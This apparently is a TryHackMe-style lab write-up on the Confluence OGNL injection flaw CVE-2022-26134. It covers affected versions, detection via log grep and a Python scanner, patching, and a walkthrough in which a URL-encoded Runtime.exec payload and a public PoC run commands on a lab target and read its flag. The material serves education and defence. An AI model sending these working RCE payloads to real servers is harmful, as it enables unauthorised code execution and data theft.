Atlassian, CVE-2022-26134

Introduction

On May 30th, 2022, an organisation named Volexity identified an unauthenticated RCE vulnerability (CVSS score 9.8 per NIST) in Atlassian's Confluence Server and Data Center editions.

Confluence is a collaborative documentation and project management framework for teams. Confluence helps track project status by offering a centralised workspace for members.

The following versions of Confluence are vulnerable to this CVE:

  • 1.3.0 -> 7.4.17

  • 7.13.0 -> 7.13.7

  • 7.14.0 -> 7.14.3

  • 7.15.0 -> 7.15.2

  • 7.16.0 -> 7.16.4

  • 7.17.0 -> 7.17.4

  • 7.18.0 -> 7.18.1

You can view the NIST entry for CVE-2022-26134 here.

Confluence is team collaboration software. Written in Java and used mainly in corporate environments, it is developed and marketed by Atlassian. Confluence is sold both as on-premises software and as a server solution.

Answer the questions below

What is the full CVE entry for this exploit?

CVE-2022-26134

You discover a server running Confluence version 7.16.2; is it vulnerable? Answer format: yay/nay

yay

Deploy the Vulnerable Machine

Now it is time to practice this vulnerability! Deploy the machine attached to this task, and craft different payloads to answer the questions below.

Note: Please wait a minimum of seven minutes for this machine to start up before attacking. You can verify the machine is ready once the login page at the following URL loads: HTTP://MACHINE_IP:8090. In the meantime, proceed with the rest of the tasks.

The Confluence login panel on HTTP://MACHINE_IP:8090.

Answer the questions below

Deploy the machine attached to this task by pressing the green button labelled "Start Machine" and proceed with the tasks.

Explaining the Vulnerability

Common Vulnerabilities and Exposures (CVE) is the term given to a publicly disclosed vulnerability.

This CVE concerns a vulnerability in the OGNL (Object-Graph Navigation Language) expression language for Java (surprise, surprise ... it's Java). OGNL is used, amongst many other things, for getting and setting properties of Java objects.

For example, OGNL is used to bind front-end elements such as text boxes to back-end objects, and is found in Java-based web applications such as Confluence. We can see how OGNL is used in the screenshot below: values entered into a web form are stored in objects within the application:

Thanks to Journaldev.com for this example of OGNL in use.

Because OGNL expressions are evaluated at runtime, we can abuse this to craft a payload that tests whether a server is exploitable.

OGNL (Object-Graph Navigation Language) is a programming language used on the Java web development platform. OGNL is often used together with the Struts Java web application framework to allow expressions to be evaluated in the application's view.

OGNL lets developers create expressions that are evaluated at runtime and that can access and manipulate the application's data. This can be useful for customising the application's output or for allowing data in the application to be modified dynamically.

Here is an example of an OGNL expression used to access a property of a Java object:

${user.name}

In this example, the OGNL expression accesses the "name" property of the "user" object. If "user" is a Java object that has a "name" property, the OGNL expression returns the value of that object's "name" property.

Answer the questions below

What does the acronym OGNL stand for?

Object-Graph Navigation Language

Exploit Detection and Patching

Patching

Atlassian has released an advisory for their products affected by this CVE, which you can read here. To resolve the issue, you need to upgrade your Confluence version. The fixed versions suggested at the time of publication are:

  • 7.4.17

  • 7.13.7

  • 7.14.3

  • 7.15.2

  • 7.16.4

  • 7.17.4

  • 7.18.1

Detection - Log Files

Confluence runs on Apache Tomcat, which writes its logs to /opt/atlassian/confluence/logs. You can use commands like grep to search for HTTP GET requests containing payloads that use the Java runtime to execute commands. For example:

  • grep -R "/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22" catalina.out
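As an added example for this section (not part of the TryHackMe room, the PoC, or Atlassian's tooling), the following Python script decodes request URIs from constructed Tomcat-style access-log lines and flags the ${...@Class@method(...)} OGNL expression the grep above looks for, including double-encoded variants that a grep for the raw string would miss. The log-format regex is an assumption; adjust it to your own access-log pattern or to catalina.out.

```python
"""Flag CVE-2022-26134-style OGNL injection attempts in Confluence request logs.

Added example for this write-up; it is not part of the TryHackMe room, the PoC
script, or Atlassian's tooling. The log lines below are constructed to resemble
Tomcat access-log entries; REQUEST_RE is an assumption about that format and
may need adjusting for catalina.out or a custom access-log pattern.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Constructed sample log: two injection attempts (the second double-encoded)
# and two benign requests.
SAMPLE_LOG = """\
10.10.14.5 - - [03/Jul/2022:10:55:17 +0000] "GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/ HTTP/1.1" 302 0
10.10.14.5 - - [03/Jul/2022:10:56:02 +0000] "GET /login.action?os_destination=%2Findex.action HTTP/1.1" 200 4211
10.10.14.9 - - [03/Jul/2022:10:57:44 +0000] "GET /%2524%257B%2540java.lang.Runtime%2540getRuntime%2528%2529.exec%2528%2522id%2522%2529%257D/ HTTP/1.1" 302 0
10.10.14.5 - - [03/Jul/2022:10:58:10 +0000] "GET /display/SPACE/Home HTTP/1.1" 200 18233
"""

# Common-log-format request line: client ... "METHOD URI HTTP/x.y" status size
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[0-9.]+"'
)

# After decoding, the payload is an OGNL expression ${...} that invokes a
# static method on a fully-qualified Java class: @pkg.Class@method(
OGNL_RE = re.compile(r"\$\{[^}]*@[\w.]+@\w+\s*\(")

# Substrings inside the expression that indicate command execution.
EXEC_MARKERS = ("java.lang.Runtime", "getRuntime()", ".exec(", "ProcessBuilder")


def fully_decode(uri: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing (handles double-encoding)."""
    for _ in range(max_rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri


def is_ognl_injection(uri: str) -> bool:
    """True if the (decoded) URI carries a ${...@Class@method(...)} expression."""
    return OGNL_RE.search(fully_decode(uri)) is not None


def inspect_line(line: str) -> Optional[dict]:
    """Return a finding for one log line, or None if it is benign or unparseable."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    decoded = fully_decode(m["uri"])
    if not OGNL_RE.search(decoded):
        return None
    return {
        "client": m["client"],
        "method": m["method"],
        "raw_uri": m["uri"],
        "decoded_uri": decoded,
        # One round of decoding was not enough, so the attacker encoded twice.
        "double_encoded": unquote(m["uri"]) != decoded,
        "command_execution": any(k in decoded for k in EXEC_MARKERS),
    }


def scan_log(text: str) -> list:
    """Scan every line of a log and return the findings in file order."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        flags = []
        if hit["double_encoded"]:
            flags.append("double-encoded")
        if hit["command_execution"]:
            flags.append("command execution")
        print(f"{hit['client']} {hit['method']} {hit['decoded_uri']}  [{', '.join(flags)}]")
```

Because the redirect Location seen in the curl output echoes the payload back in os_destination, the decoded form of that follow-up request is flagged as well; treat a hit as a trigger to pull the full request from the access log and check /tmp and process history on the host.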

Detection - YARA

If you have Yara installed on the server running Confluence, Volexity (who found the vulnerability) have published a Yara rule for you to use, located here.

Unfamiliar with Yara? Check out our Yara room here.

Answer the questions below

I've updated my vulnerable install!

https://gitlab.com/0xSamy/cve-2022-26134/-/blob/master/cve-2022-26134.py

https://useegod.com/2022/06/05/cve_2022_26134/

Exploitation


In order to exploit this vulnerability within OGNL, we need to make an HTTP GET request and place our payload within the URI. For example, we can instruct the Java runtime to execute a command such as creating a file on the server: ${@java.lang.Runtime@getRuntime().exec("touch /tmp/thm/")}/

This will need to be URL encoded, as in the snippet below. You can use this website to help URL encode your payloads (note that your curl payload will need to end in a trailing / and not %2F):

Creating a temporary file on the server to prove vulnerability

cmnatic@thm-cve-2022-26134:~$ curl -v http://localhost:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/
*   Trying 127.0.0.1:8090...
* TCP_NODELAY set
* Connected to localhost (127.0.0.1) port 8090 (#0)
> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/ HTTP/1.1
> Host: localhost:8090
> User-Agent: curl/7.68.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302
< X-ASEN: SEN-L18512764
< X-Confluence-Request-Time: 1656845716316
< Set-Cookie: JSESSIONID=761E9FA42B315225C0B84B0BAC92B2B3; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fthm%22%29%7D%2Findex.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Sun, 03 Jul 2022 10:55:17 GMT
<
* Connection #0 to host localhost left intact
cmnatic@thm-cve-2022-26134:~$

When looking at the server, we can see that it is vulnerable:

Creating a temporary file on the server to prove vulnerability

cmnatic@thm-cve-2022-26134:~$ ls /tmp
hsperfdata_confluence
thm
snap.lxd

Python

There are a few working PoC exploits out there. For this room, I will be demonstrating Samy Younsi (Nwqda)'s PoC written in Python and hosted on GitHub.

Walkthrough

First, we need to download the PoC to our host. I have decided to clone the repository using git for this room.

  1. git clone https://github.com/Nwqda/CVE-2022-26134

  2. cd CVE-2022-26134

After navigating to the source code, let's execute the script. Replace "COMMAND" with the command you wish to execute (remember to use quotation marks around commands that contain spaces or special characters).

  1. python3.9 cve-2022-26134.py HTTP://10.10.23.227:8090 COMMAND

Answer the questions below

Download the proof of concept for this task! If you are using the AttackBox, this is already done for you, where it can be found in /root/Rooms/CVE2022-26134.

┌──(kali㉿kali)-[~]
└─$ rustscan -a 10.10.23.227 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.23.227:22
Open 10.10.23.227:8090
Open 10.10.23.227:8091
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-31 21:30 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:30
Completed NSE at 21:30, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 21:30
Completed Parallel DNS resolution of 1 host. at 21:30, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 21:30
Scanning 10.10.23.227 [3 ports]
Discovered open port 22/tcp on 10.10.23.227
Discovered open port 8090/tcp on 10.10.23.227
Discovered open port 8091/tcp on 10.10.23.227
Completed Connect Scan at 21:30, 0.19s elapsed (3 total ports)
Initiating Service scan at 21:30
Scanning 3 services on 10.10.23.227
Completed Service scan at 21:32, 111.25s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.23.227.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 5.42s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 1.63s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Nmap scan report for 10.10.23.227
Host is up, received user-set (0.19s latency).
Scanned at 2022-12-31 21:30:41 EST for 118s

PORT     STATE SERVICE       REASON  VERSION
22/tcp   open  ssh           syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 feabda8f635162e8cbdf7f8fc93fd6b4 (RSA)
|   256 a420c47e04a3586db8fc1f23bc5a8de1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLqOsk3y3cmtlI1fhH+cGXkiiCm1TYBk01v5rCB9+JlTmov9lU5pVkeZe5rrQvOsI4spXb9/Ljgvp+tscqCHxKM=
|   256 6f94e30e80aa5cac41142ad4f7a2d9ac (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINYSVf24gRFbdZUK/RUMN7VmoSJzzGEqhYnB1UQcCQ0R
8090/tcp open  opsmessaging? syn-ack
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 302 
|     X-ASEN: SEN-L18512764
|     X-Confluence-Request-Time: 1672540253027
|     Set-Cookie: JSESSIONID=EAEB1C519AC1CE695F35D79AFA1C0F8E; Path=/; HttpOnly
|     X-XSS-Protection: 1; mode=block
|     X-Content-Type-Options: nosniff
|     X-Frame-Options: SAMEORIGIN
|     Content-Security-Policy: frame-ancestors 'self'
|     Location: http://localhost:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Sun, 01 Jan 2023 02:30:53 GMT
|     Connection: close
|   HTTPOptions: 
|     HTTP/1.1 200 
|     MS-Author-Via: DAV
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 0
|     Date: Sun, 01 Jan 2023 02:30:53 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 1837
|     Date: Sun, 01 Jan 2023 02:30:53 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1><hr class="line" /><p><b>Type</b> Exception Report</p><p><b>Message</b> Invalid character found in the HTTP protocol</p><p><b>Description</b> The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or decept
8091/tcp open  jamlink?      syn-ack
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Sun, 01 Jan 2023 02:31:31 GMT
|     Connection: Close
|   GetRequest: 
|     HTTP/1.1 204 No Content
|     Server: Aleph/0.4.6
|     Date: Sun, 01 Jan 2023 02:30:57 GMT
|     Connection: Close
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Sun, 01 Jan 2023 02:30:58 GMT
|     Connection: Close
|     content-length: 0
|   Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TerminalServerCookie: 
|     HTTP/1.1 414 Request-URI Too Long
|     text is empty (possibly HTTP/0.9)
|   RTSPRequest: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Sun, 01 Jan 2023 02:30:58 GMT
|     Connection: Keep-Alive
|     content-length: 0
|   SIPOptions: 
|     HTTP/1.1 200 OK
|     Access-Control-Allow-Origin: *
|     Access-Control-Max-Age: 31536000
|     Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST
|     Server: Aleph/0.4.6
|     Date: Sun, 01 Jan 2023 02:31:37 GMT
|     Connection: Keep-Alive
|     content-length: 0
|   TLSSessionReq: 
|     HTTP/1.1 414 Request-URI Too Long
|_    invalid version format: /
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:32
Completed NSE at 21:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 119.93 seconds


┌──(kali㉿kali)-[~]
└─$ curl -v http://10.10.23.227:8090/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/
*   Trying 10.10.23.227:8090...
* Connected to 10.10.23.227 (10.10.23.227) port 8090 (#0)
> GET /%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/thm%22%29%7D/ HTTP/1.1
> Host: 10.10.23.227:8090
> User-Agent: curl/7.86.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 
< X-ASEN: SEN-L18512764
< X-Confluence-Request-Time: 1672540525652
< Set-Cookie: JSESSIONID=9C081422598FF899E2CB9BAA7F3CE10E; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< Location: /login.action?os_destination=%2F%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch+%2Ftmp%2Fthm%22%29%7D%2Findex.action&permissionViolation=true
< Content-Type: text/html;charset=UTF-8
< Content-Length: 0
< Date: Sun, 01 Jan 2023 02:35:25 GMT
< 
* Connection #0 to host 10.10.23.227 left intact


┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 id

   _______    ________                                                                                        
  / ____/ |  / / ____/                                                                                        
 / /    | | / / __/                                                                                           
/ /___  | |/ / /___                                                                                           
\____/  |___/_____/___       ___   _____________ __ __                                                        
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /                                                        
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_                                                        
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/                                                        
/____/\____/____/____/    /____/\____/_//____/  /_/                                                           
                                                                                                              
                  CVE-2022-26134 - OGNL injection vulnerability                                               
Author: Naqwada                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  
Confluence target version: 7.3.5
uid=1002(confluence) gid=1002(confluence) groups=1002(confluence) 

┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 "whoami"                                        

   _______    ________                                                                                        
  / ____/ |  / / ____/                                                                                        
 / /    | | / / __/                                                                                           
/ /___  | |/ / /___                                                                                           
\____/  |___/_____/___       ___   _____________ __ __                                                        
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /                                                        
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_                                                        
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/                                                        
/____/\____/____/____/    /____/\____/_//____/  /_/                                                           
                                                                                                              
                  CVE-2022-26134 - OGNL injection vulnerability                                               
Author: Naqwada                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  
Confluence target version: 7.3.5
confluence 

┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 "ls"    

   _______    ________                                                                                        
  / ____/ |  / / ____/                                                                                        
 / /    | | / / __/                                                                                           
/ /___  | |/ / /___                                                                                           
\____/  |___/_____/___       ___   _____________ __ __                                                        
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /                                                        
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_                                                        
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/                                                        
/____/\____/____/____/    /____/\____/_//____/  /_/                                                           
                                                                                                              
                  CVE-2022-26134 - OGNL injection vulnerability                                               
Author: Naqwada                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  
Confluence target version: 7.3.5
bin boot dev etc flag.txt home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var 
                                                                                                              
┌──(kali㉿kali)-[~/Atlassian_cve]
└─$ python3 cve-2022-26134.py HTTP://10.10.23.227:8090 "cat flag.txt"

   _______    ________                                                                                        
  / ____/ |  / / ____/                                                                                        
 / /    | | / / __/                                                                                           
/ /___  | |/ / /___                                                                                           
\____/  |___/_____/___       ___   _____________ __ __                                                        
  |__ \ / __ \__ \|__ \     |__ \ / ___<  /__  // // /                                                        
  __/ // / / /_/ /__/ /_______/ // __ \/ / /_ </ // /_                                                        
 / __// /_/ / __// __/_____/ __// /_/ / /___/ /__  __/                                                        
/____/\____/____/____/    /____/\____/_//____/  /_/                                                           
                                                                                                              
                  CVE-2022-26134 - OGNL injection vulnerability                                               
Author: Naqwada                         
RuptureFarm 1029      
                FOR EDUCATIONAL PURPOSE ONLY.   
  
Confluence target version: 7.3.5
THM{OGNL_VULN} 

Completed

Ensure the login panel on HTTP://10.10.23.227:8090 loads before proceeding.

Completed

Craft a payload to identify what user the application is running as. What is the user?

confluence

Finally, craft a payload to retrieve the flag stored at /flag.txt on 10.10.23.227. What is the flag?

If your command has spaces, either URL encode it, or use quotes around it.

THM{OGNL_VULN}

Conclusion

Nice work!

Hope you enjoyed this brief showcase of the CVE-2022-26134 OGNL injection vulnerability. Remember, OGNL is an expression language for Java-based web applications, so this class of vulnerability also applies to other web apps running the same classes that Confluence uses!

Check out our Recent Threats module

Additional Reading Material:

Answer the final question to finish this room.

[[Jason]]
